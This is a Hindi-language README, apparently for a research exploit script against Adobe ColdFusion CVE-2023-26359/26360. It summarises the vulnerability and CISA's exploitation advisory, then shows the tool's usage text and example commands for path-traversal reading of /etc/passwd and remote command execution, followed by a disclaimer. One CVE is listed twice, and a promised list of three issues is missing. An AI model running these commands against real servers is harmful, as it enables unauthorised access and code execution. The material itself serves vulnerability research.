
8 मार्च, 2023 को, Adobe ने Adobe ColdFusion, एक लोकप्रिय वेब एप्लिकेशन विकास प्लेटफ़ॉर्म, में गंभीर कमजोरियों को दूर करने के लिए सुरक्षा अद्यतन जारी किए। ये कमजोरियाँ, जिन्हें अनुचित अभिगम नियंत्रण और असुरक्षित डिसीरियलाइज़ेशन के रूप में वर्गीकृत किया गया है, अनधिकृत रिमोट कोड निष्पादन (RCE) की ओर ले जाती हैं जब कोई हमलावर ColdFusion सर्वर पर अविश्वसनीय डेटा युक्त एक विशेष रूप से तैयार अनुरोध भेजता है।
इसका शोषण उपयोगकर्ता सहभागिता की आवश्यकता नहीं रखता, जिससे यह विशेष रूप से गंभीर हो जाता है क्योंकि यह हमलावरों को उपयोगकर्ता की जानकारी के बिना वर्तमान उपयोगकर्ता के संदर्भ में मनमाना कोड निष्पादित करने की अनुमति देता है।
साइबर सुरक्षा और अवसंरचना सुरक्षा एजेंसी (CISA) ने 5 दिसंबर, 2023 को इन मुद्दों के सक्रिय शोषण के संबंध में एक सलाह जारी करके इस मुद्दे की गंभीरता को उजागर किया। उन्होंने नोट किया कि यह कमजोरी साइबर खतरे वाले अभिनेताओं द्वारा सार्वजनिक रूप से सुलभ Adobe ColdFusion वेब सर्वरों तक प्रारंभिक पहुँच प्राप्त करने के लिए उपयोग की जा रही है। सबसे गंभीर कमजोरी का CVSS स्कोर 9.8 है, जो इसे गंभीर के रूप में वर्गीकृत करता है।
तो मूल रूप से आगे की जाँच के बाद, तीन अलग-अलग मुद्दों की पहचान की गई:
यह शोषण स्क्रिप्ट vsociety पर CVE विश्लेषण के लिए लिखी गई है।
सहायता:
usage: exploit.py [-h] --host HOST [--read-file READ_FILE] [--cmd CMD] [--endpoint ENDPOINT] [--win] [--proxy PROXY]
Exploit script for remote file read or command execution against Adobe ColdFusion (CVE-2023-26359, CVE-2023-26360, and CVE-2023-26359).
options:
-h, --help show this help message and exit
--host HOST Target host URL
--read-file READ_FILE, -f READ_FILE
File path to read from the host
--cmd CMD, -c CMD Command to execute on the target
--endpoint ENDPOINT Endpoint URL
--win Specify this if the target host is considered to be Windows.
--proxy PROXY Proxy URL
# Arbirary file read
python3 exploit.py --host http://localhost:8500 --read-file '../../../../etc/passwd'
# RCE
python3 exploit.py --host http://localhost:8500 --cmd 'CMD'
यह शोषण स्क्रिप्ट केवल शोध और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाई गई है। इसका उपयोग किसी भी दुर्भावनापूर्ण या अनधिकृत गतिविधियों के लिए नहीं किया जाना है। लेखक और स्क्रिप्ट के स्वामी इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी या दायित्व अस्वीकार करते हैं। उपयोगकर्ताओं से आग्रह किया जाता है कि वे इस सॉफ़्टवेयर का जिम्मेदारी से और केवल लागू कानूनों और विनियमों के अनुसार उपयोग करें। जिम्मेदारी से उपयोग करें।